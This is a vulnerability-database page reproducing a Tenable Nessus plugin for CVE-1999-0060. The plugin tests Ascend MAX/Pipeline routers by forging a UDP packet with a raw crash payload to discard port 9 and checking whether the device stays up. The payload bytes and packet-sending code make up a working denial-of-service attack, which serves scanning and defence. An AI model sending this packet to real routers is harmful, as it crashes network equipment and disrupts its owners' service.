Vulners
Lucene search
Ascend MAX / Pipeline Router Discard Port Malformed Packet DoS
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
 | CVE-1999-0060 | 29 Sep 199904:00 | – | cve |
 | CVE-1999-0060 | 29 Sep 199904:00 | – | cvelist |
 | EUVD-1999-0060 | 7 Oct 202500:30 | – | euvd |
 | CVE-1999-0060 | 16 Mar 199805:00 | – | nvd |
 | PT-1998-1018 · Ascend +1 · Ascend Max +2 | 16 Mar 199800:00 | – | ptsecurity |
 | CVE-1999-0060 | 7 Jan 202609:39 | – | redhatcve |
| Source | Link |
|---|---|
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(10019);
script_version("1.32");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-1999-0060");
script_bugtraq_id(714);
script_name(english:"Ascend MAX / Pipeline Router Discard Port Malformed Packet DoS");
script_summary(english:"Crashes an ascend router");
script_set_attribute(attribute:"synopsis", value:
"The remote router is susceptible to a remote denial of service
vulnerability.");
script_set_attribute(attribute:"description", value:
"It was possible to make the remote Ascend router reboot by sending it
a UDP packet containg special data on port 9 (discard).
An attacker may use this flaw to make your router crash continuously,
preventing your network from working properly.");
script_set_attribute(attribute:"solution", value:"Upgrade to the latest router firmware.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"1998/03/16");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_KILL_HOST);
script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
script_family(english:"Denial of Service");
script_require_keys("Settings/ParanoidReport");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
if ( TARGET_IS_IPV6 ) exit(0);
start_denial();
crash = raw_string(0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4,
0x81, 0x00, 0x00, 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41,
0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50,
0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57,
0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53);
port = 9;
ip = forge_ip_packet(ip_hl: 5, ip_v : 4, ip_tos : 123,
ip_len : 80, ip_id:1234, ip_off : 0,
ip_ttl : 0xff, ip_p:IPPROTO_UDP,
ip_src : compat::this_host());
udp = forge_udp_packet(ip:ip,
uh_sport : 9,
uh_dport : 9,
uh_ulen : 60,
data:crash);
send_packet(udp, pcap_active:FALSE) x 10;
sleep(5);
alive = end_denial();
if(!alive){
security_warning(port:port, protocol:"udp");
set_kb_item(name:"Host/dead", value:TRUE);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2019 18:38Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
EPSS0.10965